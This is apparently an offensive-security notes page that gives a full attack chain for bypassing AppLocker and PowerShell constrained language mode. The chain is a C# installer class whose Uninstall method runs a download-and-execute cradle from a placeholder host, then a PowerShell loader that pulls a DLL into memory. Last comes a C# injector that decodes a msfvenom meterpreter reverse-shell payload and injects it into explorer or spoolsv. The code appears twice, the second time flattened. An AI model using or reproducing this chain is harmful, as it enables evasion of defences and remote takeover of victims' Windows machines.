Powershell CLM Bypass

Using installer method to bypass applocker and constrained language mode

using System;

using System.Management.Automation;

using System.Management.Automation.Runspaces;

using System.Configuration.Install;

using System.Runtime.InteropServices;

using System.Security.Principal;

using System.Diagnostics;



namespace Powershell_CLM_Bypass

{

    class Program

    {

        static void Main(string[] args)

        {

            Console.WriteLine("This is the main method which is a decoy");

        }

    }



    [System.ComponentModel.RunInstaller(true)]

    public class Sample : System.Configuration.Install.Installer

    {

        public override void Uninstall(System.Collections.IDictionary savedState)

        {

            String cmd = "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.X.Y/run_dll.txt')";

            Runspace rs = RunspaceFactory.CreateRunspace();

            rs.Open();

            PowerShell ps = PowerShell.Create();

            ps.Runspace = rs;

            ps.AddScript(cmd);

            ps.Invoke();

            rs.Close();

        }

    }

}

Powershell Script to load a dll into memory

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.X.Y/Reflective_Load.dll')
$assem = [System.Reflection.Assembly]::Load($data)
$class = $assem.GetType("Reflective_Load.Program")
$method = $class.GetMethod("runner")
$method.Invoke(0, $null)

Reflective DLL Loaded into memory

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;





namespace Reflective_Load

{

    [ComVisible(true)]

    public class Program

    {

        [Flags]

        public enum ProcessAccessFlags : uint

        {

            All = 0x001F0FFF

        }

        [Flags]

        public enum AllocationType

        {

            Commit = 0x1000,

            Reserve = 0x2000

        }



        [Flags]

        public enum MemoryProtection

        {

            ExecuteReadWrite = 0x40

        }



        [DllImport("kernel32.dll", SetLastError = true)]

        public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);



        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect);



        [DllImport("kernel32.dll", SetLastError = true)]

        public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);



        [DllImport("kernel32.dll")]

        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);



        [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]

        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);



        [System.Runtime.InteropServices.DllImport("kernel32.dll")]

        static extern IntPtr GetCurrentProcess();



        static bool IsElevated

        {

            get

            {

                return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid);

            }

        }

        public static void runner()

        {

            IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);

            if (mem == null)

            {

                return;

            }



            // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.X.Y LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key J

            byte[] buf = new byte[803] {
PAYLOAD};





            int len = buf.Length;

            String procName = "";

            // Parse arguments, if given (process to inject)

            if (IsElevated)

            {

                Console.WriteLine("Process is elevated.");

                 procName = "spoolsv";

            }

            else

            {

                Console.WriteLine("Process is not elevated.");

                 procName = "explorer";

            }

            



            Console.WriteLine($"Attempting to inject into {procName} process...");



            // Get process IDs

            Process[] expProc = Process.GetProcessesByName(procName);



            // If multiple processes exist, try to inject in all of them

            for (int i = 0; i < expProc.Length; i++)

            {

                int pid = expProc[i].Id;



                // Get a handle on the process

                IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid);

                if ((int)hProcess == 0)

                {

                    Console.WriteLine($"Failed to get handle on PID {pid}.");

                    continue;

                }

                Console.WriteLine($"Got handle {hProcess} on PID {pid}.");



                // Allocate memory in the remote process

                IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);

                Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process.");



                // Decode the payload

                for (int j = 0; j < buf.Length; j++)

                {

                    buf[j] = (byte)((uint)buf[j] ^ 0x4a);

                }



                // Write the payload to the allocated bytes

                IntPtr bytesWritten;

                bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten);

                Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult}).");



                IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero);

                Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!");

                break;

            }

        }

    }

}

PreviousAppLocker Bypass NextLinux Shellcode Encoders

Last updated 3 years ago

Was this helpful?

using System; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Configuration.Install; using System.Runtime.InteropServices; using System.Security.Principal; using System.Diagnostics; namespace Powershell_CLM_Bypass { class Program { static void Main(string[] args) { Console.WriteLine("This is the main method which is a decoy"); } } [System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary savedState) { String cmd = "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.X.Y/run_dll.txt')"; Runspace rs = RunspaceFactory.CreateRunspace(); rs.Open(); PowerShell ps = PowerShell.Create(); ps.Runspace = rs; ps.AddScript(cmd); ps.Invoke(); rs.Close(); } } }

$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.X.Y/Reflective_Load.dll') $assem = [System.Reflection.Assembly]::Load($data) $class = $assem.GetType("Reflective_Load.Program") $method = $class.GetMethod("runner") $method.Invoke(0, $null)

using System; using System.Diagnostics; using System.Runtime.InteropServices; using System.Security.Principal; namespace Reflective_Load { [ComVisible(true)] public class Program { [Flags] public enum ProcessAccessFlags : uint { All = 0x001F0FFF } [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 } [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, AllocationType flAllocationType, MemoryProtection flProtect); [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred); [System.Runtime.InteropServices.DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess(); static bool IsElevated { get { return WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid); } } public static void runner() { IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0); if (mem == null) { return; } // msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.X.Y LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key J byte[] buf = new byte[803] { PAYLOAD}; int len = buf.Length; String procName = ""; // Parse arguments, if given (process to inject) if (IsElevated) { Console.WriteLine("Process is elevated."); procName = "spoolsv"; } else { Console.WriteLine("Process is not elevated."); procName = "explorer"; } Console.WriteLine($"Attempting to inject into {procName} process..."); // Get process IDs Process[] expProc = Process.GetProcessesByName(procName); // If multiple processes exist, try to inject in all of them for (int i = 0; i < expProc.Length; i++) { int pid = expProc[i].Id; // Get a handle on the process IntPtr hProcess = OpenProcess(ProcessAccessFlags.All, false, pid); if ((int)hProcess == 0) { Console.WriteLine($"Failed to get handle on PID {pid}."); continue; } Console.WriteLine($"Got handle {hProcess} on PID {pid}."); // Allocate memory in the remote process IntPtr expAddr = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)len, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite); Console.WriteLine($"Allocated {len} bytes at address {expAddr} in remote process."); // Decode the payload for (int j = 0; j < buf.Length; j++) { buf[j] = (byte)((uint)buf[j] ^ 0x4a); } // Write the payload to the allocated bytes IntPtr bytesWritten; bool procMemResult = WriteProcessMemory(hProcess, expAddr, buf, len, out bytesWritten); Console.WriteLine($"Wrote {bytesWritten} payload bytes (result: {procMemResult})."); IntPtr threadAddr = CreateRemoteThread(hProcess, IntPtr.Zero, 0, expAddr, IntPtr.Zero, 0, IntPtr.Zero); Console.WriteLine($"Created remote thread at {threadAddr}. Check your listener!"); break; } } } }